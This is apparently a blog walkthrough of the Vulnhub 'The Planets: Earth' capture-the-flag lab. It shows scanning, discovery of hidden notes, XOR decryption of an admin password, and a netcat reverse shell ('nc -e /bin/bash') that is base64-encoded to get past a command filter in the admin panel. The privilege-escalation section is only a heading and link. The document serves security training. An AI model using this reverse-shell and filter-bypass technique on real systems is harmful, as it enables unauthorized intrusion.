
Vulnhub: The Planets Earth machine walkthrough

Date: 2022-12-11 11:22:12  Views: 43
Tags: kali 192.168 Disallow Vulnhub Planets earth Earth

The Planets Earth

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.134.0/16   |   Screen View: Unique Hosts                                                       

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:6f:27:91      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.229  08:00:27:c0:ac:18      1      60  PCS Systemtechnik GmbH     

Using the netdiscover tool bundled with Kali Linux, the target host's IP address was identified as 192.168.56.229.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.229 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-10 08:40 EST
Nmap scan report for bogon (192.168.56.229)
Host is up (0.00034s latency).
Not shown: 65382 filtered tcp ports (no-response), 150 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:C0:AC:18 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.33 seconds

The Nmap scan revealed the hostnames earth.local and terratest.earth.local (from the TLS certificate's Subject Alternative Name); add them to the /etc/hosts file.

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ sudo vim /etc/hosts                                        

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ cat /etc/hosts             
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.229  terratest.earth.local
192.168.56.229  earth.local

Getting a shell

Port 80 must be accessed by hostname rather than by IP address (a request by IP only returns the Bad Request (400) seen in the Nmap output).

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ gobuster dir -u http://earth.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://earth.local
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/10 21:40:27 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 0] [--> /admin/]
Progress: 220100 / 220561 (99.79%)===============================================================
2022/12/10 21:43:51 Finished
===============================================================
                                                                               
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ curl -k https://terratest.earth.local/robots.txt
User-Agent: *
Disallow: /*.asp
Disallow: /*.aspx
Disallow: /*.bat
Disallow: /*.c
Disallow: /*.cfm
Disallow: /*.cgi
Disallow: /*.com
Disallow: /*.dll
Disallow: /*.exe
Disallow: /*.htm
Disallow: /*.html
Disallow: /*.inc
Disallow: /*.jhtml
Disallow: /*.jsa
Disallow: /*.json
Disallow: /*.jsp
Disallow: /*.log
Disallow: /*.mdb
Disallow: /*.nsf
Disallow: /*.php
Disallow: /*.phtml
Disallow: /*.pl
Disallow: /*.reg
Disallow: /*.sh
Disallow: /*.shtml
Disallow: /*.sql
Disallow: /*.txt
Disallow: /*.xml
Disallow: /testingnotes.*

Guessing that the extension is .txt, i.e. /testingnotes.txt:

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ curl https://terratest.earth.local/testingnotes.txt -k
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

From testingnotes.txt we learn:

  1. The admin portal username is terra

  2. The messages on the home page are encrypted with XOR

  3. The XOR key probably comes from testdata.txt

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ curl https://terratest.earth.local/testdata.txt -k    
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

Open the online CyberChef site; the XOR key is the content of testdata.txt:

and the encrypted message is the third block of hex data on the home page:


This yields the admin portal password:

earthclimatechangebad4humans

So the credentials are:

username: terra

password: earthclimatechangebad4humans
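The CyberChef step above, written out in Python as an added example (not code from the original write-up): repeating-key XOR with the testdata.txt text as the key. The hex ciphertext here is constructed by encrypting the recovered password, because the real hex from the home page is not reproduced in this post; the last function also shows why the testing notes' belief that XOR "should be safe" is wrong, since any known plaintext gives the key back directly.

```python
# Added example, not from the original write-up: the CyberChef XOR step in Python.
# Assumptions: KEY is the testdata.txt text quoted above; SAMPLE_HEX is a
# CONSTRUCTED ciphertext (the real hex from the home page is not in this post).

KEY = (
    "According to radiometric dating estimation and other evidence, Earth "
    "formed over 4.5 billion years ago. Within the first billion years of "
    "Earth's history, life appeared in the oceans and began to affect Earth's "
    "atmosphere and surface, leading to the proliferation of anaerobic and, "
    "later, aerobic organisms. Some geological evidence indicates that life "
    "may have arisen as early as 4.1 billion years ago."
)
PASSWORD = "earthclimatechangebad4humans"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key; the key repeats if data is longer than the key."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_hex_message(hex_message: str, key: str) -> str:
    """What CyberChef did: hex-decode the message, then XOR with the text key."""
    ciphertext = bytes.fromhex(hex_message.strip())
    return xor_bytes(ciphertext, key.encode()).decode("utf-8", errors="replace")


def encrypt_to_hex(plaintext: str, key: str) -> str:
    """Inverse direction, used only to build the constructed sample below."""
    return xor_bytes(plaintext.encode(), key.encode()).hex()


def recover_key_fragment(hex_message: str, known_plaintext: str) -> str:
    """Why 'XOR ... should be safe' is wrong: ciphertext XOR known plaintext
    returns the key bytes at those positions, no brute force needed."""
    ciphertext = bytes.fromhex(hex_message.strip())[: len(known_plaintext)]
    key_bytes = xor_bytes(ciphertext, known_plaintext.encode())
    return key_bytes.decode("utf-8", errors="replace")


# Constructed sample: the hex the home page would carry for this password/key.
SAMPLE_HEX = encrypt_to_hex(PASSWORD, KEY)

if __name__ == "__main__":
    print("constructed ciphertext:", SAMPLE_HEX)
    print("decrypted:", decrypt_hex_message(SAMPLE_HEX, KEY))
    print("key recovered from known plaintext:",
          recover_key_fragment(SAMPLE_HEX, PASSWORD))
```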

Log in to the admin portal; after a successful login it presents a command execution window:

I first entered: nc -e /bin/bash 192.168.56.206 5555

which produced the error: Remote connections are forbidden.

The command needs to be base64-encoded:

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ echo 'nc -e /bin/bash 192.168.56.206 5555' | base64                    
bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMjA2IDU1NTUK

Then enter the following in the command box:

echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMjA2IDU1NTUK | base64 -d | bash

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.229] 40676
id
uid=48(apache) gid=48(apache) groups=48(apache)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash-5.1$ ls

A shell was successfully obtained on Kali Linux.

Privilege escalation

From: https://www.cnblogs.com/jason-huawen/p/16972982.html
